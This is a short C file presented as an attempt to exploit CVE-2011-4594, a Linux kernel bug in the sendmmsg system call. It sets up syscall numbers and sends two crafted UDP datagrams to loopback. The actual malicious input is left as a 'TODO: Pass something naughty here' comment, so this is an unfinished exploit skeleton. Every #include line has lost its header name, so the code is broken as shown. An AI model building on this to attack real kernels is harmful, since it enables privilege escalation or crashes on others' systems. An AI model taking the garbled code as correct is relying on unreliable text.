/* * Socket Splickt * by zx2c4 * * This is an attempt to exploit CVE-2011-4594. * * It was patched in bc909d9ddbf7778371e36a651d6e4194b1cc7d4c. * */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifndef __NR_sendmmsg #if defined( __PPC__) #define __NR_sendmmsg 349 #elif defined(__x86_64__) #define __NR_sendmmsg 307 #elif defined(__i386__) #define __NR_sendmmsg 345 #else #error __NR_sendmmsg not defined #endif #endif struct reimp_mmsghdr { struct msghdr msg_hdr; unsigned int msg_len; }; static inline int reimp_sendmmsg(int fd, struct reimp_mmsghdr *mmsg, unsigned int vlen, unsigned int flags) { return syscall(__NR_sendmmsg, fd, mmsg, vlen, flags, NULL); } int main(int argc, char *argv[]) { const int fd = socket(AF_INET, SOCK_DGRAM, 0); char buf[10]; struct iovec iovec[1]; struct reimp_mmsghdr datagram[2]; struct sockaddr_in addr; memset(buf, 0, sizeof(buf)); memset(iovec, 0, sizeof(iovec)); memset(&datagram[0], 0, sizeof(datagram[0])); memset(&datagram[1], 0, sizeof(datagram[1])); memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); addr.sin_port = htons(10000); iovec[0].iov_base = buf; iovec[0].iov_len = sizeof(buf); datagram[0].msg_hdr.msg_iov = iovec; datagram[0].msg_hdr.msg_iovlen = 1; datagram[1].msg_hdr.msg_iov = iovec; datagram[1].msg_hdr.msg_iovlen = 1; /* TODO: Pass something naughty here. */ datagram[0].msg_hdr.msg_name = &addr; datagram[0].msg_hdr.msg_namelen = sizeof(addr); datagram[1].msg_hdr.msg_name = &addr; datagram[1].msg_hdr.msg_namelen = sizeof(addr); int ret; if ((ret = reimp_sendmmsg(fd, datagram, 2, 0)) < 0) { perror("reimp_sendmmsg"); exit(1); } printf("Sent %d packets.\n", ret); return 0; }